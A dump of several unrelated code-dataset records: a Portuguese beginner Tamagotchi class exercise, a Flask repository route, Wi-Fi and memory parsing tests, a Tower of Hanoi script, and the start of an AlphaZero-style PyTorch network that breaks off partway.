Crie uma classe que modele um Tamagushi (Bichinho Eletrônico):\n# \t> Atributos: Nome, Fome, Saúde e Idade;\n# \t> Métodos: Alterar Nome, Fome, Saúde e Idade; \n# \t> Retornar Nome, Fome, Saúde e Idade;\n# \tObs: Existe mais uma informação que devemos levar em consideração, o Humor do nosso tamagushi, este humor é\tuma combinação entre\n# \tos atributos Fome e Saúde, ou seja, um campo calculado, então não devemos criar um atributo para armazenar esta informação por \n# \tque ela pode ser calculada a qualquer momento.\nimport os\nimport time\n\nlista_frutas = [{'codigo': 1,'descricao': 'Maçã', 'valor_energetico': 10, 'saude': 10 },\n\t\t\t\t{'codigo': 2,'descricao':'Morango', 'valor_energetico': 2, 'saude': 20 },\n\t\t\t\t{'codigo': 3,'descricao': 'Melão', 'valor_energetico': 30, 'saude': 40 } ]\n\t\nlista_massas = [{'codigo': 1,'descricao': 'Lazanha', 'valor_energetico': 80, 'saude': 2},\n\t\t\t\t{'codigo': 2,'descricao': 'Macarrão', 'valor_energetico': 60, 'saude': 5},\n\t\t\t\t{'codigo': 3,'descricao': 'Panqueca', 'valor_energetico': 40, 'saude': 3} ]\n\nlista_doces = [{'codigo': 1, 'descricao': 'Bala', 'valor_energetico': 20, 'saude': -2},\n\t\t\t {'codigo': 2, 'descricao': 'Chocolate', 'valor_energetico': 20, 'saude': 1},\n\t\t\t {'codigo': 3, 'descricao': 'Doce de Leite', 'valor_energetico': 20, 'saude': -8} ]\n\t\nlista_bebidas = [{'codigo': 1, 'descricao': 'Refrigerante', 'valor_energetico': 40, 'saude': -20},\n\t\t\t\t {'codigo': 2, 'descricao': 'Suco Natural', 'valor_energetico': 10, 'saude': 5},\n\t\t\t\t {'codigo': 3, 'descricao': 'Água', 'valor_energetico': 2, 'saude': 30} ]\n\nlista_remedios = [{'codigo': 1, 'descricao': 'Aspirina', 'valor_energetico': -2, 'saude': 3},\n\t\t\t\t {'codigo': 2, 'descricao': 'Dipirona', 'valor_energetico': -10, 'saude': 10},\n\t\t\t\t {'codigo': 3, 'descricao': 'Antibiotico', 'valor_energetico': -70, 'saude': 100} ]\n\nclass BichinhoEletrônico():\n\n\tdef __init__(self, nome='', fome=20, saude=80, idade=1):\n\t\tself.nome = nome\n\t\tself.fome = fome\n\t\tself.saude = saude\n\t\tself.idade = idade\n\t\n\tdef limpar_tela(self):\n\t\tif os.name == 'nt':\n\t\t\tos.system('cls')\n\t\telse:\n\t\t\tos.system('clear')\t\n\t\tprint('-' *50,'\\n')\n\t\tself.humor_bichinho()\n\t\tprint('-' *50)\n\n\tdef mostrar_bichinho(self):\n\t\tself.limpar_tela()\n\t\tif (self.idade >= 1) and (self.idade <= 3):\n\t\t\tclasse = 'Categoria: Bebê'\n\t\telif(self.idade >=4) and (self.idade <=10):\n\t\t\tclasse = 'Categoria: Criança'\n\t\telif(self.idade >= 11) and (self.idade <= 17):\n\t\t\tclasse = 'Categoria: Adolescente'\n\t\telif (self.idade >= 18) and (self.idade <= 25):\n\t\t\tclasse = 'Categoria: Jovem'\n\t\telif (self.idade >= 25) and (self.idade <= 60):\n\t\t\tclasse = 'Categoria: Adulto'\n\t\telse:\n\t\t\tclasse = 'Categoria: Idoso'\n\t\tprint('\\nNome -------------> {}' .format(self.nome) )\n\t\tprint('Fome -------------> {:<3} %' .format(self.fome) )\n\t\tprint('Saúde -------------> {:<3} %' .format(self.saude))\n\t\tprint('Idade -------------> {:<3}{:>25}' .format(self.idade, classe))\n\t\tprint('-' *50)\n\t\tself.menu()\n\t\n\tdef menu(self):\n\t\tprint('[1] - Alimentar {}' .format(self.nome))\n\t\tprint('[2] - Dar remédio para {}' .format(self.nome))\n\t\tprint('[3] - Colocar {} para dormir' .format(self.nome))\n\t\tprint('[4] - Abandonar {}' .format(self.nome))\n\t\twhile True:\n\t\t\topcao = int(input('\\n>> '))\n\t\t\tif opcao == 1:\n\t\t\t\tself.alimentando_bichinho()\n\t\t\t\tbreak\n\t\t\telif opcao == 
2:\n\t\t\t\tself.saude_bichinho()\n\t\t\t\tbreak\n\t\t\telif opcao == 3:\n\t\t\t\tif os.name == 'nt':\n\t\t\t\t\tos.system('cls')\n\t\t\t\telse:\n\t\t\t\t\tos.system('clear')\n\t\t\t\tprint('-' *50, '\\n')\n\t\t\t\tprint(' (u_u) {} dormindo...' .format(self.nome))\n\t\t\t\tprint('-' *50)\n\t\t\t\tsono = ['ZZZZZzzzzzz......','ZZZZzzz...','ZZZzz..','Zz..','...']\n\t\t\t\tfor i in range(0,5):\n\t\t\t\t\tprint('\\n', sono[i])\n\t\t\t\t\ttime.sleep(0.8)\n\t\t\t\ttime.sleep(0.7)\n\t\t\t\tinput('\\nDigite ENTER para acordar o {} ' .format(self.nome))\n\t\t\t\tself.idade += 1\n\t\t\t\tif self.fome >= 50:\n\t\t\t\t\tself.fome = 100\n\t\t\t\telse:\n\t\t\t\t\tself.fome += 50\n\t\t\t\tif self.saude > 70:\n\t\t\t\t\tself.saude = 100\n\t\t\t\telse:\n\t\t\t\t\tself.saude += 30\n\t\t\t\tself.mostrar_bichinho()\t\t\t\t\n\t\t\t\tbreak\n\t\t\telif opcao == 4:\t\t\t\t\n\t\t\t\tif os.name == 'nt':\n\t\t\t\t\tos.system('cls')\n\t\t\t\telse:\n\t\t\t\t\tos.system('clear')\n\t\t\t\tprint('-' *50, '\\n')\n\t\t\t\tprint(' (;_;) {} chorando...' .format(self.nome))\n\t\t\t\tprint('-' *50)\n\t\t\t\tprint('\\nVocê abandonou o {}!\\n\\n' .format(self.nome))\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint('Dados Inválidos')\n\t\t\n\tdef alterar_nome(self):\n\t\tif os.name == 'nt':\n\t\t\tos.system('cls')\n\t\telse:\n\t\t\tos.system('clear')\t\t\n\t\tprint('Bichinho Eletrônico')\n\t\tprint('Lembre-se:\\n> O bichinho fica 1 ano mais velho cada vez que dorme.')\n\t\tprint('> Precisa alimentar o seu bichinho.\\n> Cuide da saúde de seu bichinho.')\n\t\tprint('-' *50)\n\t\tn = input('Dê um nome para o seu bichinho eletrônico: ')\n\t\tself.nome = n\n\t\tself.mostrar_bichinho()\n\n\tdef humor_bichinho(self):\n\t\tif (self.fome >= 60) and (self.fome <= 100):\n\t\t\tif self.saude < 40:\n\t\t\t\tprint(' (@_@) {} está doente e com muita fome!' .format(self.nome))\n\t\t\telse:\n\t\t\t\tprint(' (v_v) {} está com muita fome!' .format(self.nome))\n\t\telif (self.fome > 20) and (self.fome <= 59):\n\t\t\tif self.saude < 40:\n\t\t\t\tprint(' (o_o) {} está doente e começando a ficar com fome!' .format(self.nome))\n\t\t\telse:\n\t\t\t\tprint(' (^_^) {} está começando a ficar com fome!' .format(self.nome))\n\t\telse:\n\t\t\tif self.saude < 40:\n\t\t\t\tprint(' (-_-) {} está doente!' .format(self.nome))\n\t\t\telse:\n\t\t\t\tprint(' \\(^_^)/ {} está muito contente!' 
.format(self.nome))\n\t\n\tdef alimentando_bichinho(self):\n\t\tself.limpar_tela()\n\t\tprint('Alimente o {} '.format(self.nome))\n\t\tprint('[1] - Frutas\\n[2] - Massas\\n[3] - Doces\\n[4] - Bebidas\\n')\n\t\twhile True:\n\t\t\topcao = int(input('>> '))\n\t\t\tif opcao == 1:\n\t\t\t\tself.limpar_tela()\n\t\t\t\tprint('[1] - Frutas ( Tabela )\\n\\nCódigo Descrição Valor_energ Saúde')\n\t\t\t\tprint('-' *50)\n\t\t\t\tfor i in lista_frutas:\n\t\t\t\t\tprint('{:<8}{:<14}{:^11}{:^7}' .format(i['codigo'], i['descricao'], i['valor_energetico'], i['saude'] ))\n\t\t\t\tprint('-' *50)\n\t\t\t\tself.comida(1)\n\t\t\t\tbreak\n\t\t\telif opcao == 2:\n\t\t\t\tself.limpar_tela()\n\t\t\t\tprint('[2] - Massas ( Tabela )\\n\\nCódigo Descrição Valor_energ Saúde')\n\t\t\t\tprint('-' *50)\n\t\t\t\tfor i in lista_massas:\n\t\t\t\t\tprint('{:<8}{:<14}{:^11}{:^7}' .format(i['codigo'], i['descricao'], i['valor_energetico'], i['saude'] ))\n\t\t\t\tprint('-' *50)\n\t\t\t\tself.comida(2)\n\t\t\t\tbreak\n\t\t\telif opcao == 3:\n\t\t\t\tself.limpar_tela()\n\t\t\t\tprint('[3] - Doces ( Tabela )\\n\\nCódigo Descrição Valor_energ Saúde')\n\t\t\t\tprint('-' *50)\n\t\t\t\tfor i in lista_doces:\n\t\t\t\t\tprint('{:<8}{:<14}{:^11}{:^7}' .format(i['codigo'], i['descricao'], i['valor_energetico'], i['saude'] ))\n\t\t\t\tprint('-' *50)\n\t\t\t\tself.comida(3)\n\t\t\t\tbreak\n\t\t\telif opcao == 4:\n\t\t\t\tself.limpar_tela()\n\t\t\t\tprint('[4] - Frutas ( Tabela )\\n\\nCódigo Descrição Valor_energ Saúde')\n\t\t\t\tprint('-' *50)\n\t\t\t\tfor i in lista_bebidas:\n\t\t\t\t\tprint('{:<8}{:<14}{:^11}{:^7}' .format(i['codigo'], i['descricao'], i['valor_energetico'], i['saude'] ))\n\t\t\t\tprint('-' *50)\n\t\t\t\tself.comida(4)\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint('Dados inválidos! ')\n\t\n\tdef comida(self, dados_comida):\n\t\tif dados_comida == 1:\n\t\t\twhile True:\t\t\t\n\t\t\t\topcao = int(input('\\n>> '))\n\t\t\t\tif opcao > len(lista_frutas):\n\t\t\t\t\tprint('Dados Inválidos! ')\n\t\t\t\telse:\n\t\t\t\t\tfor i in lista_frutas:\n\t\t\t\t\t\tif i['codigo'] == opcao:\n\t\t\t\t\t\t\tself.fome = self.fome - i['valor_energetico']\n\t\t\t\t\t\t\tself.saude = self.saude + i['saude']\n\t\t\t\t\tif self.fome < 0:\n\t\t\t\t\t\tself.fome = 0\n\t\t\t\t\tif self.saude > 100:\n\t\t\t\t\t\tself.saude = 100\n\t\t\t\t\tbreak\n\t\t\tprint('{} comendo ..... ' .format(self.nome))\n\t\t\ttime.sleep(3)\n\t\t\tself.mostrar_bichinho()\n\t\telif dados_comida == 2:\n\t\t\twhile True:\t\t\t\n\t\t\t\topcao = int(input('\\n>> '))\n\t\t\t\tif opcao > len(lista_frutas):\n\t\t\t\t\tprint('Dados Inválidos! ')\n\t\t\t\telse:\n\t\t\t\t\tfor i in lista_massas:\n\t\t\t\t\t\tif i['codigo'] == opcao:\n\t\t\t\t\t\t\tself.fome = self.fome - i['valor_energetico']\n\t\t\t\t\t\t\tself.saude = self.saude + i['saude']\n\t\t\t\t\tif self.fome < 0:\n\t\t\t\t\t\tself.fome = 0\n\t\t\t\t\tif self.saude > 100:\n\t\t\t\t\t\tself.saude = 100\n\t\t\t\t\tbreak\n\t\t\tprint('{} comendo ..... ' .format(self.nome))\n\t\t\ttime.sleep(3)\n\t\t\tself.mostrar_bichinho()\n\t\telif dados_comida == 3:\n\t\t\twhile True:\t\t\t\n\t\t\t\topcao = int(input('\\n>> '))\n\t\t\t\tif opcao > len(lista_frutas):\n\t\t\t\t\tprint('Dados Inválidos! 
')\n\t\t\t\telse:\n\t\t\t\t\tfor i in lista_doces:\n\t\t\t\t\t\tif i['codigo'] == opcao:\n\t\t\t\t\t\t\tself.fome = self.fome - i['valor_energetico']\n\t\t\t\t\t\t\tself.saude = self.saude + i['saude']\n\t\t\t\t\tif self.fome < 0:\n\t\t\t\t\t\tself.fome = 0\n\t\t\t\t\tif self.saude > 100:\n\t\t\t\t\t\tself.saude = 100\n\t\t\t\t\tbreak\n\t\t\tprint('{} comendo ..... ' .format(self.nome))\n\t\t\ttime.sleep(3)\n\t\t\tself.mostrar_bichinho()\n\t\telif dados_comida == 4:\n\t\t\twhile True:\t\t\t\n\t\t\t\topcao = int(input('\\n>> '))\n\t\t\t\tif opcao > len(lista_frutas):\n\t\t\t\t\tprint('Dados Inválidos! ')\n\t\t\t\telse:\n\t\t\t\t\tfor i in lista_bebidas:\n\t\t\t\t\t\tif i['codigo'] == opcao:\n\t\t\t\t\t\t\tself.fome = self.fome - i['valor_energetico']\n\t\t\t\t\t\t\tself.saude = self.saude + i['saude']\n\t\t\t\t\tif self.fome < 0:\n\t\t\t\t\t\tself.fome = 0\n\t\t\t\t\tif self.saude > 100:\n\t\t\t\t\t\tself.saude = 100\n\t\t\t\t\tbreak\n\t\t\tprint('{} bebendo ..... ' .format(self.nome))\n\t\t\ttime.sleep(3)\n\t\t\tself.mostrar_bichinho()\n\t\n\tdef saude_bichinho(self):\n\t\tself.limpar_tela()\n\t\tprint('Dê remédio para o {} '.format(self.nome))\n\t\tprint('Remédio ( Tabela )\\n\\nCódigo Descrição Valor_energ Saúde')\n\t\tprint('-' *50)\n\t\tfor i in lista_remedios:\n\t\t\tprint('{:<8}{:<14}{:^11}{:^7}' .format(i['codigo'], i['descricao'], i['valor_energetico'], i['saude'] ))\n\t\tprint('-' *50)\n\t\tvalidador = False\n\t\twhile True:\n\t\t\tdados = int(input('\\n>> '))\n\t\t\tfor i in lista_remedios:\n\t\t\t\tif dados == i['codigo']:\n\t\t\t\t\tvalidador = True\n\t\t\tif validador == True:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint('Dados inválidos!')\n\t\tfor i in lista_remedios:\n\t\t\tif i['codigo'] == dados:\n\t\t\t\tself.fome = self.fome - i['valor_energetico']\n\t\t\t\tself.saude = self.saude + i['saude']\n\t\t\tif self.fome < 0:\n\t\t\t\tself.fome = 0\n\t\t\tif self.saude > 100:\n\t\t\t\tself.saude = 100\n\t\tprint('{} tomando remédio ....' 
.format(self.nome))\n\t\ttime.sleep(3)\n\t\tself.mostrar_bichinho()\n\nb = BichinhoEletrônico()\nb.alterar_nome()\n","repo_name":"rafaelpederiva/Resposta_Python_Brasil","sub_path":"Exercícios de Classes/Exercício 07 - Bichinho Virtual.py","file_name":"Exercício 07 - Bichinho Virtual.py","file_ext":"py","file_size_in_byte":10119,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71662524641","text":"import json\nimport typing as t\n\nfrom flask import Blueprint, request, redirect, url_for\n\nfrom api.api_model.index import ResponseRepoAdd, RepoListItem\nfrom api.routes import login_required, current_user\nfrom models.repo import MyRepo\nfrom models.user import User\nfrom services.repo import ServiceRepo\nfrom src.utils import log, timestamp_to_date\n\nmain = Blueprint('repo', __name__)\n\n\n@main.route('/add', methods=['POST'])\n@login_required\ndef add():\n form: dict = request.form\n log(\"add form\", form)\n repo_name: str = form.get(\"repo_name\")\n description: str = form.get('description', '')\n user: User = current_user()\n\n add_result = ServiceRepo.add_repo(user_id=user.id, repo_name=repo_name, description=description)\n result: bool = add_result[0]\n repo_info: MyRepo = add_result[1]\n #\n response = ResponseRepoAdd(\n result=result,\n )\n if result:\n response.repo_id = repo_info.id\n response.repo_name = repo_info.repo_name\n return redirect(url_for('myself', username=user.username))\n\n\n@main.route('/list', methods=['GET'])\n@login_required\ndef get_list():\n user: User = current_user()\n repo_list: t.List[MyRepo] = MyRepo.find_all(user_id=user.id)\n result: t.List[t.Dict] = []\n for repo in repo_list:\n item = RepoListItem(\n repo_id=repo.id,\n repo_name=repo.repo_name,\n create_time=timestamp_to_date(repo.create_time),\n )\n result.append(item.dict())\n return dict(\n repo_list=result,\n )\n","repo_name":"jane255/myGitWeb","sub_path":"src/api/routes/repo.py","file_name":"repo.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"45162268760","text":"import sysmgmt.app.sysinfo as sysinfo\n\n\ndef test_parseIwConfigConnected():\n iwconfigStr = \"\"\"wlan0 IEEE 802.11 ESSID:\"PanicAtTheDisco\" \n Mode:Managed Frequency:2.437 GHz Access Point: 06:63:D3:77:91:F0 \n Bit Rate=72.2 Mb/s Tx-Power=31 dBm \n Retry short limit:7 RTS thr:off Fragment thr:off\n Power Management:on\n Link Quality=60/70 Signal level=-36 dBm \n Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0\n Tx excessive retries:289 Invalid misc:0 Missed beacon:0\"\"\"\n tokens = sysinfo.Wifi.parseIwConfig(iwconfigStr)\n assert 5 == len(tokens)\n assert \"PanicAtTheDisco\" == tokens[\"ssid\"]\n assert 2.437 == tokens[\"frequency\"]\n assert \"06:63:D3:77:91:F0\" == tokens[\"accesspoint\"]\n assert 0.857 == tokens[\"linkQuality\"]\n assert -36 == tokens[\"signalLevel\"]\n\n\ndef test_parseIwConfigDisconnected():\n iwconfigStr = \"\"\"wlan0 IEEE 802.11 ESSID:off/any \n Mode:Managed Access Point: Not-Associated Tx-Power=31 dBm \n Retry short limit:7 RTS thr:off Fragment thr:off\n Power Management:on\"\"\"\n tokens = sysinfo.Wifi.parseIwConfig(iwconfigStr)\n assert 5 == len(tokens)\n assert tokens[\"ssid\"] is None\n assert tokens[\"frequency\"] is None\n assert tokens[\"accesspoint\"] == \"Not-Associated\"\n assert tokens[\"linkQuality\"] is None\n assert tokens[\"signalLevel\"] is None\n\n\ndef test_parseIwConfigMalformed():\n iwconfigStr = \"\"\"wlan0 IEEE 
802.11 ESSIID:\"PanicAtTheDisco\" \n Mode:Managed Frequency:2.4B37 GHz Access Point: 06:63:D3:77:91:F0 \n Bit Rate=72.2 Mb/s Tx-Power=31 dBm \n Retry short limit:7 RTS thr:off Fragment thr:off\n Power Management:on\n Link Quality=6070 Signal level=--36 dBm \n Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0\n Tx excessive retries:289 Invalid misc:0 Missed beacon:0\"\"\"\n tokens = sysinfo.Wifi.parseIwConfig(iwconfigStr)\n assert 5 == len(tokens)\n assert tokens[\"ssid\"] is None\n assert tokens[\"frequency\"] is None\n assert tokens[\"accesspoint\"] == \"06:63:D3:77:91:F0\"\n assert tokens[\"linkQuality\"] is None\n assert tokens[\"signalLevel\"] is None\n\n\ndef test_parseIwlistWelformed():\n iwlistStr = \"\"\"- Cell 01 - Address: 96:AE:10:E1:03:CC\n Frequency:2.437 GHz (Channel 6)\n Quality=57/70 Signal level=-53 dBm\n Encryption key:on\n ESSID:\"PanicAtTheDisco\"\n Cell 02 - Address: 8C:19:B5:B1:63:99\n Frequency:2.437 GHz (Channel 6)\n Quality=49/70 Signal level=-61 dBm\n Encryption key:on\n ESSID:\"Salt_2GHz_B16397\"\n Cell 03 - Address: 96:AE:10:E1:03:CC\n Frequency:2.437 GHz (Channel 6)\n Quality=60/70 Signal level=-50 dBm\n Encryption key:on\n ESSID:\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n Cell 04 - Address: 74:DA:38:45:37:0A\n Frequency:2.417 GHz (Channel 2)\n Quality=42/70 Signal level=-68 dBm\n Encryption key:on\n ESSID:\"edimax_2.4G_45370A\"\n Cell 05 - Address: 8C:19:B5:B1:63:98\n Frequency:5.26 GHz (Channel 52)\n Quality=27/70 Signal level=-83 dBm\n Encryption key:on\n ESSID:\"Salt_5GHz_B16397\"\n Cell 06 - Address: 72:19:B5:B1:63:9A\n Frequency:5.26 GHz (Channel 52)\n Quality=27/70 Signal level=-83 dBm\n Encryption key:on\n ESSID:\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n Cell 07 - Address: 62:19:B5:B1:63:9B\n Frequency:2.437 GHz (Channel 6)\n Quality=48/70 Signal level=-62 dBm\n Encryption key:on\n ESSID:\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\"\"\n wifilist = sysinfo.Wifi.parseIwList(iwlistStr)\n assert len(wifilist) == 7\n first = wifilist[0]\n assert first[\"ssid\"] == \"PanicAtTheDisco\"\n assert first[\"frequency\"] == 2.437\n assert first[\"accesspoint\"] == \"96:AE:10:E1:03:CC\"\n assert first[\"linkQuality\"] == 0.814\n assert first[\"signalLevel\"] == -53.0\n assert first[\"encrypted\"] is True\n\n\ndef test_parseIwlistInvalidString():\n iwlistStr = \"\"\"wlan0 Interface doesn't support scanning.\"\"\"\n wifilist = sysinfo.Wifi.parseIwList(iwlistStr)\n assert len(wifilist) == 0\n\n\ndef test_parseWpaSupplicantConfWellformed():\n wpaSupplicantStr = \"\"\"ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev\n update_config=1\n country=CH\n\n network={\n ssid=\"TestSSID\"\n psk=\"Test123\"\n }\"\"\"\n wpaSupConf = sysinfo.Wifi.parseWpaSupplicantConf(wpaSupplicantStr)\n assert \"ctrl_interface\" in wpaSupConf\n assert \"update_config\" in wpaSupConf\n assert \"country\" in wpaSupConf\n assert \"networks\" in wpaSupConf\n assert wpaSupConf[\"country\"] == \"CH\"\n assert len(wpaSupConf[\"networks\"]) == 1\n assert \"ssid\" in wpaSupConf[\"networks\"][0]\n assert \"psk\" in wpaSupConf[\"networks\"][0]\n\n\ndef test_writeWpaSupplicantConfToString():\n referenceStr = (\n \"# autogenerated config by easyadsb sysmgmt\\n\"\n \"ctrl_interface=dummy ctrl str\\n\"\n \"update_config=0\\n\"\n \"country=CH\\n\"\n \"network={\\n\"\n \"\\tssid=\\\"dummy_ssid\\\"\\n\"\n \"\\tpsk=passwordhash123\\n\"\n \"}\\n\"\n )\n wpaSupConf = {\n \"ctrl_interface\": \"dummy 
ctrl str\",\n \"update_config\": 0,\n \"country\": \"CH\",\n \"networks\": [\n {\n \"ssid\": \"dummy_ssid\",\n \"psk\": \"passwordhash123\"\n }\n ]\n }\n wpaSupConfStr = sysinfo.Wifi.wpaSupplicantConfToStr(wpaSupConf)\n assert wpaSupConfStr == referenceStr\n\n\ndef test_parseMemInfoWellformed():\n meminfoList = [\n \"MemTotal: 1917292 kB\",\n \"MemFree: 567356 kB\",\n \"MemAvailable: 1155448 kB\",\n \"Buffers: 69816 kB\",\n \"Cached: 526020 kB\",\n \"SwapCached: 0 kB\",\n \"Active: 238264 kB\",\n \"Inactive: 977668 kB\",\n \"Active(anon): 1496 kB\",\n \"Inactive(anon): 578716 kB\",\n \"Active(file): 236768 kB\",\n \"Inactive(file): 398952 kB\",\n \"Unevictable: 3012 kB\",\n \"Mlocked: 16 kB\",\n \"HighTotal: 1232896 kB\",\n \"HighFree: 64344 kB\",\n \"LowTotal: 684396 kB\",\n \"LowFree: 503012 kB\",\n \"SwapTotal: 102396 kB\",\n \"SwapFree: 102396 kB\",\n \"Dirty: 400 kB\",\n \"Writeback: 0 kB\",\n \"AnonPages: 623116 kB\",\n \"Mapped: 217768 kB\",\n \"Shmem: 5736 kB\",\n \"KReclaimable: 51048 kB\",\n \"Slab: 73744 kB\",\n \"SReclaimable: 51048 kB\",\n \"SUnreclaim: 22696 kB\",\n \"KernelStack: 3096 kB\",\n \"PageTables: 8384 kB\",\n \"NFS_Unstable: 0 kB\",\n \"Bounce: 0 kB\",\n \"WritebackTmp: 0 kB\",\n \"CommitLimit: 1061040 kB\",\n \"Committed_AS: 1543004 kB\",\n \"VmallocTotal: 245760 kB\",\n \"VmallocUsed: 6396 kB\",\n \"VmallocChunk: 0 kB\",\n \"Percpu: 544 kB\",\n \"CmaTotal: 327680 kB\",\n \"CmaFree: 314548 kB\",\n ]\n memInfo = sysinfo.Resources.parseMemInfo(meminfoList)\n assert 3 == len(memInfo)\n assert 1917292 == memInfo[\"memTotal\"]\n assert 567356 == memInfo[\"memFree\"]\n assert 0 == memInfo[\"swapCached\"]\n\n\ndef test_parseMemInfoMissingEntries():\n meminfoList = [\n \"MemTotal: 1917292 kB\",\n \"SwapCached: 0 kB\",\n ]\n memInfo = sysinfo.Resources.parseMemInfo(meminfoList)\n assert 3 == len(memInfo)\n assert 1917292 == memInfo[\"memTotal\"]\n assert memInfo[\"memFree\"] is None\n assert 0 == memInfo[\"swapCached\"]\n\n\ndef test_parseMemInfoMalformed():\n meminfoList = [\"MemTotal: 1917A292 kB\", \"SwapCached: 0:\", \"MemFree\"]\n memInfo = sysinfo.Resources.parseMemInfo(meminfoList)\n assert 3 == len(memInfo)\n assert memInfo[\"memTotal\"] is None\n assert memInfo[\"memFree\"] is None\n assert memInfo[\"swapCached\"] is None\n\n\ndef test_parseCpuTempWellformed():\n temperature = sysinfo.Resources.parseCpuTemperature(\"68166\")\n assert 68.166 == temperature\n\n\ndef test_parseCpuTempMalformed():\n temperature = sysinfo.Resources.parseCpuTemperature(\"banana\")\n assert temperature is None\n\n","repo_name":"gravity981/easyadsb","sub_path":"core/sysmgmt/tests/test_sysinfo.py","file_name":"test_sysinfo.py","file_ext":"py","file_size_in_byte":8875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28933851275","text":"t = int(input())\r\nn = []\r\nfor i in range(t):\r\n x, y = map(int, input().split())\r\n n.append((x, y))\r\n\r\n\r\ndef toh(n, val, a=1, b=2, c=3):\r\n moves = (2**n) - 1\r\n for i in range(1, moves + 1):\r\n if i % 3 == 1:\r\n print(str(a) + \" \" + str(c))\r\n elif i % 3 == 2:\r\n print(str(a) + \" \" + str(b))\r\n elif i % 3 == 0:\r\n print(str(b) + \" \" + str(c))\r\nfor i in n:\r\n toh(i[0], i[1])\r\n","repo_name":"hirenbhanushali/codeforces","sub_path":"old man.py","file_name":"old man.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23332084924","text":"\"\"\"\nAlphazero network 
implementation getted from paper:\nMastering the game of Go without human knowledge, Silver et al.\n\n'The input features st are processed by a residual tower that consists of a single\nconvolutional block followed by either 19 or 39 residual blocks.\nThe convolutional block applies the following modules:\n(1) A convolution of 256 filters of kernel size 3 ×​3 with stride 1\n(2) Batch normalization 18\n(3) A rectifier nonlinearity\nEach residual block applies the following modules sequentially to its input:\n(1) A convolution of 256 filters of kernel size 3 ×​3 with stride 1\n(2) Batch normalization\n(3) A rectifier nonlinearity\n(4) A convolution of 256 filters of kernel size 3 ×​3 with stride 1\n(5) Batch normalization\n(6) A skip connection that adds the input to the block\n(7) A rectifier nonlinearity\nThe output of the residual tower is passed into two separate ‘heads’ for\ncomputing the policy and value. The policy head applies the following modules:\n(1) A convolution of 2 filters of kernel size 1 ×​1 with stride 1\n(2) Batch normalization\n(3) A rectifier nonlinearity\n(4) A fully connected linear layer that outputs a vector of size 192 +​ 1 =​ 362,\ncorresponding to logistic probabilities for all intersections and the pass move\nThe value head applies the following modules:\n(1) A convolution of 1 filter of kernel size 1 ×​1 with stride 1\n(2) Batch normalization\n(3) A rectifier nonlinearity\n(4) A fully connected linear layer to a hidden layer of size 256\n(5) A rectifier nonlinearity\n(6) A fully connected linear layer to a scalar\n(7) A tanh nonlinearity outputting a scalar in the range [−​1, 1]\nThe overall network depth, in the 20- or 40-block network, is 39 or 79 parameterized layers, respectively,\nfor the residual tower, plus an additional 2 layers for the policy head and 3 layers for the value head.\nWe note that a different variant of residual networks was simultaneously applied\nto computer Go33 and achieved an amateur dan-level performance; however, this\nwas restricted to a single-headed policy network trained solely by supervised learning.\n\nNeural network architecture comparison. Figure 4 shows the results of a comparison between network architectures.\nSpecifically, we compared four different neural networks:\n(1) dual–res: the network contains a 20-block residual tower, as described above,\nfollowed by both a policy head and a value head. This is the architecture used in AlphaGo Zero.\n(2) sep–res: the network contains two 20-block residual towers. The first tower\nis followed by a policy head and the second tower is followed by a value head.\n(3) dual–conv: the network contains a non-residual tower of 12 convolutional\nblocks, followed by both a policy head and a value head.\n(4) sep–conv: the network contains two non-residual towers of 12 convolutional\nblocks. The first tower is followed by a policy head and the second tower is followed\nby a value head. 
This is the architecture used in AlphaGo Lee.\nEach network was trained on a fixed dataset containing the final 2 million\ngames of self-play data generated by a previous run of AlphaGo Zero, using\nstochastic gradient descent with the annealing rate, momentum and regularization hyperparameters described for\nthe supervised learning experiment; however, cross-entropy and MSE components were weighted equally,\nsince more data was available.'\n\"\"\"\nimport chess\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.optim.lr_scheduler import StepLR\n\nimport lightning.pytorch as pl\n\nfrom dinora.encoders.board_representation import board_to_tensor\nfrom dinora.encoders.policy import extract_prob_from_policy\n\n\ndef softmax(x, tau=1.0):\n e_x = np.exp(x / tau)\n return e_x / e_x.sum()\n\n\ndef dummy_wdl(scalar):\n wdl = softmax(np.array([scalar, 0, -scalar]))\n return wdl\n\n\nclass ResBlock(nn.Module):\n def __init__(self, filters: int):\n super().__init__()\n self.body = nn.Sequential(\n nn.Conv2d(\n in_channels=filters,\n out_channels=filters,\n kernel_size=3,\n padding=1,\n bias=False,\n ),\n nn.BatchNorm2d(num_features=filters),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=filters,\n out_channels=filters,\n kernel_size=3,\n padding=1,\n bias=False,\n ),\n nn.BatchNorm2d(num_features=filters),\n )\n self.relu = nn.ReLU()\n\n def forward(self, x):\n return self.relu(self.body(x) + x)\n\n\nclass AlphaNet(pl.LightningModule):\n def __init__(\n self,\n filters: int = 256,\n res_blocks: int = 19,\n policy_channels: int = 64,\n value_channels: int = 8,\n value_fc_hidden: int = 256,\n learning_rate: float = 0.001,\n lr_scheduler_gamma: float = 1.0,\n lr_scheduler_freq: int = 1000,\n ):\n super().__init__()\n self.learning_rate = learning_rate\n self.lr_scheduler_gamma = lr_scheduler_gamma\n self.lr_scheduler_freq = lr_scheduler_freq\n\n self.convblock = nn.Sequential(\n nn.Conv2d(\n in_channels=18,\n out_channels=filters,\n kernel_size=3,\n padding=1,\n bias=False,\n ),\n 